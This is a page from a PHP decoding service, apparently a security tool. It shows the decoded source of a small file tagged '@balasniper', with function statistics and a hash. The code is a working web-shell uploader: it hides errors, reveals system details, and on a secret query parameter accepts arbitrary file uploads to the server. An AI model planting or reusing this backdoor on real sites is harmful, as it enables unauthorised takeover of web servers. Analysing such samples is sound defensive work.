Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

@balasniper <?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['b..

Decoded Output download

@balasniper
<?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['bala'] == 'up'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>

Did this file decode correctly?

Original Code

@balasniper
<?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['bala'] == 'up'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>

Function Calls

getcwd 1
php_uname 1
error_reporting 1

Variables

None

Stats

MD5 882b7da8d330339fc20768402bb4f3df
Eval Count 0
Decode Time 102 ms